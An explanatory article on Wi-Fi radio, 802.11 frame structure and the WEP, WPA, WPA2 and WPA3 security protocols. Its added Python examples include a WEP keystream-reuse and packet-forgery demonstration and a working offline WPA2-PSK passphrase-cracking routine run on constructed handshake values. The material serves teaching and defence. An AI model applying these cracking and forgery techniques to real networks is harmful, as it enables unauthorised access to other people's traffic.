In today’s age we use Wi-Fi and internet for a lot of things. Like a lot. Ever wondered how Wi-Fi works? Or if internet and Wi-Fi are the same thing? Let’s discuss it!

What is Wi-Fi?

The internet is basically a "network of networks": it uses the TCP/IP protocol suite to connect devices and networks globally. In layman's terms, it connects everyone with everything by using a globally agreed-upon method of communication (TCP/IP) to create one big global network that interconnects networks with each other. There are multiple ways to access the internet: over physical media like fibre optics and copper cables, or over wireless technology like Wi-Fi and satellite.

Wi-Fi is one of the ways to reach the device that gives us access to the internet. It is a family of wireless networking protocols that lets a device connect to a router/access point to reach the internet, or set up a LAN so that nearby devices can share data. For example, we can print wirelessly without setting up a physical connection because of Wi-Fi.

It is based on the IEEE 802.11 family of standards, which define the rules of communication. To this day Wi-Fi uses a large number of patents held by many different organizations. Australia, the United States and the Netherlands all claim the invention of Wi-Fi, and no global consensus has been reached. Since 1999, "Wi-Fi" has been a trademark of the non-profit Wi-Fi Alliance, an international association of companies involved with wireless LAN technologies and products. Manufacturers may use the trademark to brand products certified for Wi-Fi interoperability.

How does Wi-Fi work?

Each device has a network adaptor fitted by the manufacturer. It is a physical component that lets the device interface with a local area network (LAN) or another type of network in order to access the internet.

TLDR: All the communications happen over radio waves over an agreed upon frequency. The data is sent in form of data packets over radio.

Detailed:

  1. How does the data travel over radio?
  • As with all radio, it is done using modulation and demodulation of carrier waves. This is done by a modem (computer hardware; the name comes from modulator–demodulator) which converts data from digital form into an analog transmission format. The sender's modem transmits the data by modulating a carrier wave (changing a property of the periodic waveform such as its frequency, phase or amplitude) and the receiver's modem demodulates it back into its original digital form.
  • Different versions of Wi-Fi use different techniques: 802.11b uses direct-sequence spread spectrum on a single carrier, whereas 802.11a, Wi-Fi 4, 5 and 6 use orthogonal frequency-division multiplexing (OFDM).
  • Stations come programmed with a globally unique 48-bit MAC address. MAC addresses specify both the destination and the source of each data packet. Think of the MAC address as your house address and the station as the post office: the network interface (the postmaster) doesn't accept packets meant for other stations. Note that the MAC address is transmitted in the clear in every frame header and can be changed in software, so it identifies a station but does not authenticate it.
  • Channels are used to send the data packets. They are half duplex and can be time-shared by multiple networks. When communication happens on the same channel, anything sent by one computer is locally received by all, even if that information is intended for just one destination. The network interface card interrupts the CPU only when applicable packets are received; the card ignores information not addressed to it (though a card in monitor mode can capture all of it). Using the same channel also means the data bandwidth is shared, so that, for example, the bandwidth available to each device is halved when two stations are actively transmitting.
  2. How are the channels created and defined?
  • The 802.11 standard provides several distinct radio frequency ranges for use in Wi-Fi communications: the 900 MHz, 2.4 GHz, 3.6 GHz, 4.9 GHz, 5 GHz, 5.9 GHz and 60 GHz bands. Each range is divided into a multitude of channels. In the standards, channels are numbered at 5 MHz spacing within a band (except in the 60 GHz band, where they are 2.16 GHz apart), and the number refers to the centre frequency of the channel.
[Figure: 2.4 GHz channels]
  • A scheme known as carrier-sense multiple access with collision avoidance (CSMA/CA) governs the way stations share channels.
  • Countries apply their own regulations to the allowable channels, allowed users and maximum power levels within these frequency ranges. Spectrum assignments and operational limitations are not consistent worldwide: Australia and Europe allow for an additional two channels (12, 13) beyond the 11 permitted in the United States for the 2.4 GHz band, while Japan has three more (12–14).
[Figure: Non-overlapping 2.4 GHz channels]
  3. What is the data packet structure?
  • The data is organized into 802.11 frames that are very similar to Ethernet frames at the data link layer, but with extra address fields. MAC addresses are used as network addresses for routing over the LAN.
  • Wi-Fi's MAC and physical layer (PHY) specifications are defined by IEEE 802.11 for modulating and receiving one or more carrier waves to transmit the data in the infrared and the 2.4, 5 and 60 GHz frequency bands. They are created and maintained by the IEEE LAN/MAN Standards Committee (IEEE 802).
  • For internetworking purposes, Wi-Fi is usually layered as a link layer (equivalent to the physical and data link layers of the OSI model) below the internet layer of the Internet Protocol. This means that nodes have an associated internet address and, with suitable connectivity, this allows full Internet access.
[Figure: Generic 802.11 frame format]
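As an added worked example (not code from the original post), here is a small Python parser for the 802.11 MAC header described above. It reads the frame control field, works out which of the three (or four) address fields carry the source, destination and BSSID from the To DS / From DS bits, and reports whether the body is encrypted. The sample frame is constructed for the demonstration: a WPA2-protected QoS data frame from a client to its access point.

```python
import struct

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211_header(frame: bytes) -> dict:
    """Parse the MAC header of a management or data frame.

    Control frames (ACK, RTS/CTS, ...) have shorter headers and are rejected here.
    """
    fc0, fc1, duration = struct.unpack_from("<BBH", frame, 0)
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype == 1:
        raise ValueError("control frames have a different header layout")
    to_ds, from_ds = bool(fc1 & 0x01), bool(fc1 & 0x02)
    protected = bool(fc1 & 0x40)          # body is encrypted (WEP/TKIP/CCMP); the header never is
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    hdr_len, a4 = 24, None
    if to_ds and from_ds:                 # wireless distribution system: four addresses
        a4, hdr_len = frame[24:30], 30
    if ftype == 2 and subtype & 0x08:     # QoS data subtypes carry a 2-byte QoS control field
        hdr_len += 2
    # The meaning of the address fields depends on the To DS / From DS bits.
    if not to_ds and not from_ds:
        da, sa, bssid = a1, a2, a3        # ad-hoc, or management frames within the BSS
    elif from_ds and not to_ds:
        da, bssid, sa = a1, a2, a3        # AP -> client
    elif to_ds and not from_ds:
        bssid, sa, da = a1, a2, a3        # client -> AP
    else:
        da, sa, bssid = a3, a4, None      # AP -> AP; a1/a2 are receiver/transmitter
    return {
        "type": FRAME_TYPES[ftype], "subtype": subtype,
        "to_ds": to_ds, "from_ds": from_ds, "protected": protected, "retry": bool(fc1 & 0x08),
        "duration": duration,
        "da": mac_str(da), "sa": mac_str(sa), "bssid": mac_str(bssid) if bssid else None,
        "seq": seq_ctrl >> 4, "frag": seq_ctrl & 0xF,
        "header_len": hdr_len, "body": frame[hdr_len:],
    }


# Constructed sample: a WPA2-protected QoS data frame from a client to its AP.
SAMPLE_FRAME = (
    b"\x88\x41"                          # frame control: data / QoS data, To DS=1, Protected=1
    b"\x2c\x00"                          # duration
    + bytes.fromhex("001122334455")      # addr1 = BSSID (the AP)
    + bytes.fromhex("aabbccddee01")      # addr2 = SA (the client)
    + bytes.fromhex("005056000001")      # addr3 = DA (final destination, e.g. the gateway)
    + b"\x10\x00"                        # sequence control: sequence 1, fragment 0
    + b"\x00\x00"                        # QoS control
    + bytes.fromhex("0100002000000000")  # CCMP header (packet number, key id), then ciphertext
    + bytes.fromhex("deadbeefcafef00d")
)

if __name__ == "__main__":
    for k, v in parse_80211_header(SAMPLE_FRAME).items():
        print(f"{k:>10}: {v!r}")
```

Even on a WPA2 network, everything this parser prints is readable by anyone in radio range; only the body after the CCMP header is encrypted. That is why MAC addresses, BSSIDs and sequence numbers are available to passive sniffers and why MAC filtering is not an access control.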

Wi-Fi Security Protocols

WEP, WPA, WPA2, and the latest WPA3 are the four types of wireless network security protocols, each with increasing levels of security.

  1. WEP- Wired Equivalent Privacy
  • Introduced as part of the original IEEE 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.
  • WEP was the only encryption protocol available to 802.11a and 802.11b devices built before the WPA standard, which was available for 802.11g devices.
  • WEP uses the RC4 stream cipher for confidentiality and a CRC-32 checksum (the ICV) for integrity. For each packet the RC4 key is built by prepending a 24-bit Initialization Vector (IV) to the shared secret key: with a 40-bit shared key this gives the 64-bit seed of "WEP-64" (a 104-bit key gives "WEP-128"). The IV is sent in the clear in the frame, so the receiver reverses the process: it combines the IV with the shared key to regenerate the same keystream and decrypts the payload. Because the IV space is only 2^24 and RC4 is a stream cipher, IVs repeat on a busy network and a repeated keystream leaks the XOR of two plaintexts; and because CRC-32 is linear, an attacker can flip plaintext bits and fix up the ICV without knowing the key.
  • Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication. Ironically, Open System is more secure: Shared Key authentication sends a plaintext challenge and its RC4-encrypted response over the air, which hands an eavesdropper a keystream that can then be used to forge frames.
  • The Caffe Latte attack was one of the attacks WEP was vulnerable to; it recovers the WEP key from a client alone, without the attacker being in range of the real access point.
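The two weaknesses above (keystream reuse under a repeated IV, and the linear CRC-32 ICV) are easy to see in code. The following is an added example, not code from the original post: a toy WEP implementation (textbook RC4 plus CRC-32 ICV) with a constructed 40-bit key and constructed frames. It shows that two frames under one IV leak the XOR of their plaintexts, and that an attacker who never learns the key can rewrite a plaintext and fix the ICV so the frame still verifies.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the data with the generated keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (sent in the clear) || RC4(IV || key, plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    iv, ciphertext = body[:3], body[3:]
    payload = rc4(iv + key, ciphertext)
    data, tag = payload[:-4], payload[-4:]
    if tag != icv(data):
        raise ValueError("ICV check failed")
    return data


def keystream_reuse(body1: bytes, body2: bytes) -> bytes:
    """Two frames under the same IV share a keystream: C1 xor C2 = P1 xor P2, no key needed."""
    assert body1[:3] == body2[:3], "demonstration needs a repeated IV"
    return xor(body1[3:], body2[3:])[:-4]   # drop the XOR of the two ICVs


def flip_bits(body: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the plaintext and fix the ICV without the key.

    CRC-32 (with its init/final XOR) is affine over GF(2):
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length).
    """
    iv, ciphertext = body[:3], body[3:]
    fix = (zlib.crc32(delta) ^ zlib.crc32(b"\x00" * len(delta))) & 0xFFFFFFFF
    return iv + xor(ciphertext, delta + struct.pack("<I", fix))


# Constructed demo values: a 40-bit key and two same-length requests sent under one IV.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"                 # 24-bit IV; busy networks exhaust these in hours
P1 = b"GET /index.html HTTP/1.1"
P2 = b"GET /admin.html HTTP/1.1"


def demo():
    c1 = wep_encrypt(KEY, IV, P1)
    c2 = wep_encrypt(KEY, IV, P2)
    leaked = keystream_reuse(c1, c2)        # == xor(P1, P2), recovered without KEY
    forged = flip_bits(c1, xor(P1, P2))     # turns the /index.html frame into /admin.html
    return leaked, wep_decrypt(KEY, forged)  # the forged frame passes the ICV check


if __name__ == "__main__":
    leaked, recovered = demo()
    print("P1 xor P2 leaked:", leaked == xor(P1, P2))
    print("forged frame decrypts to:", recovered)
```

The forgery in `flip_bits` is exactly what a keyed MAC (as in WPA's Michael or WPA2's CBC-MAC) prevents: a checksum that is a linear function of the data can always be corrected alongside the data.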
  2. WPA
  • The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i-2004 standard. WPA could be implemented through firmware upgrades on wireless NICs that began shipping as far back as 1999. However, since the changes required in wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.
  • WPA implements the Temporal Key Integrity Protocol (TKIP). WEP used a static 64-bit or 128-bit key that had to be entered manually on the access point and on every device and never changed. TKIP keeps RC4 for compatibility with existing hardware but adds per-packet key mixing, dynamically generating a new 128-bit key for each packet, which closes the IV-reuse and related-key attacks that compromised WEP.
  • WPA also includes a Message Integrity Check, which is designed to prevent an attacker from altering and resending data packets. This replaces the cyclic redundancy check (CRC) that was used by the WEP standard.
  • Researchers have since discovered a flaw in WPA that relied on older weaknesses in WEP and the limitations of the message integrity code hash function, named Michael, to retrieve the keystream from short packets to use for re-injection and spoofing.
  3. WPA2
  • WPA2 replaced WPA in 2004 with the full IEEE 802.11i implementation, and remained the mandatory baseline for Wi-Fi trademark certification until WPA3 became mandatory in 2020.
  • In WPA2-protected WLANs, secure communication is established through a multi-step process. Initially, devices associate with the Access Point (AP) via an association request. This is followed by the 4-way handshake, which lets both the client and the AP prove they hold the correct Pre-Shared Key (PSK) without ever transmitting it. During this handshake a Pairwise Transient Key (PTK) is derived from the PSK, both MAC addresses and a nonce from each side, and the PTK is then used for the data exchange. Because everything except the PSK travels in the clear, a captured handshake lets an attacker test passphrase guesses offline, so a weak passphrase is the most common WPA2 failure in practice.
  • WPA2 employs the Advanced Encryption Standard (AES) with a 128-bit key through the Counter-Mode/CBC-MAC Protocol (CCMP): AES in counter mode provides confidentiality and CBC-MAC provides integrity, both driven by a 48-bit packet number that serves as the nonce and must never repeat under the same key.
  • Hole196 is a vulnerability in the WPA2 protocol that abuses the shared Group Temporal Key (GTK): every authenticated client knows the GTK and can use it to spoof group-addressed traffic from the AP, enabling man-in-the-middle and denial-of-service attacks against other clients on the same network.
  • In October 2017, details of the KRACK (Key Reinstallation Attack) on WPA2 were published. KRACK exploits a weakness in the WPA2 4-way handshake: by replaying message 3, an attacker tricks the client into reinstalling an already-in-use key, which resets its packet number and replay counter. The same nonce is then reused with the same key, so the attacker can decrypt (and, with TKIP or GCMP, forge) traffic without cracking the encryption or learning the password.
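Added example, not the page's own code: the WPA2-Personal key derivation behind the 4-way handshake, followed by the offline dictionary attack that a captured handshake enables. The SSID, passphrase, MAC addresses, nonces and the EAPOL message 2 frame are all constructed here; in a real capture they are read from the handshake frames, and the MIC carried in message 2 is what a cracker checks its guesses against.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits) for WPA2-Personal."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-X: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = KCK || KEK || TK (48 bytes for CCMP). Only the MACs and nonces go over the air."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_zero_mic: bytes) -> bytes:
    """MIC for AKM 00-0F-AC:2 (WPA2-PSK): HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, 16 bytes."""
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


def eapol_msg2_zero_mic(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with its MIC field zeroed."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP, PSK AKM
    body = (
        b"\x02"                 # descriptor type: IEEE 802.11 key descriptor
        b"\x01\x0a"             # key info: MIC bit set, pairwise, descriptor version 2 (HMAC-SHA1)
        b"\x00\x10"             # key length: 16
        + b"\x00" * 8           # replay counter
        + snonce                # client nonce
        + b"\x00" * 16          # key IV
        + b"\x00" * 8           # key RSC
        + b"\x00" * 8           # key ID
        + b"\x00" * 16          # MIC field, zeroed while the MIC is computed
        + len(rsn_ie).to_bytes(2, "big") + rsn_ie   # key data: the client's RSN IE
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 1, type 3 (Key)


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zero_mic, observed_mic, candidates):
    """Offline dictionary attack: every input except the passphrase is visible in the capture."""
    for cand in candidates:
        kck = wpa2_ptk(wpa2_pmk(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zero_mic), observed_mic):
            return cand
    return None


# Constructed demo values (a real capture supplies all of these except the passphrase).
SSID = "CoffeeShop"
PASSPHRASE = "latte-2024!"
AA = bytes.fromhex("0011223344ff")     # AP MAC address (authenticator)
SPA = bytes.fromhex("aabbccddee01")    # client MAC address (supplicant)
ANONCE = bytes(range(32))              # real nonces are random 32-byte values
SNONCE = bytes(range(32, 64))


def demo():
    # Both sides derive the same PTK; the client's message 2 carries the MIC computed under the KCK.
    kck = wpa2_ptk(wpa2_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    msg2 = eapol_msg2_zero_mic(SNONCE)
    observed_mic = eapol_mic(kck, msg2)
    wordlist = ["password", "coffeeshop", "latte-2024!", "12345678"]   # constructed wordlist
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, observed_mic, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each guess costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is cheap on a GPU, so the only real defence with WPA2-PSK is a long random passphrase. This is the attack that WPA3's SAE exchange is designed to rule out.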
  4. WPA3
  • In January 2018, the Wi-Fi Alliance announced WPA3 as a replacement for WPA2. WPA3 support has been mandatory for devices that bear the "Wi-Fi CERTIFIED™" logo since July 2020.
  • The new standard uses an equivalent 192-bit cryptographic strength in WPA3-Enterprise mode (AES-256 in GCM mode (Galois/Counter Mode) with SHA-384 as HMAC), and still mandates CCMP-128 (AES-128 in CCM mode) as the minimum encryption algorithm in WPA3-Personal mode.
  • WPA3 also replaces the pre-shared key (PSK) exchange with the Simultaneous Authentication of Equals (SAE) exchange, a method originally introduced with IEEE 802.11s, giving a more secure initial key exchange in personal mode and forward secrecy. Because SAE is a password-authenticated key exchange, a captured handshake no longer allows the offline dictionary attack that works against WPA2-PSK. WPA3 also supports Opportunistic Wireless Encryption (OWE) for open Wi-Fi networks that do not have passwords.
  • WPA3 is not without vulnerabilities: the Dragonblood attacks (2019) showed side-channel and downgrade weaknesses in SAE and EAP-pwd, and the FragAttacks (2021) affect frame fragmentation and aggregation in all Wi-Fi generations, WPA3 included. In response, security updates and protocol changes have been integrated into WPA3 and EAP-pwd to address these vulnerabilities and enhance overall Wi-Fi security.
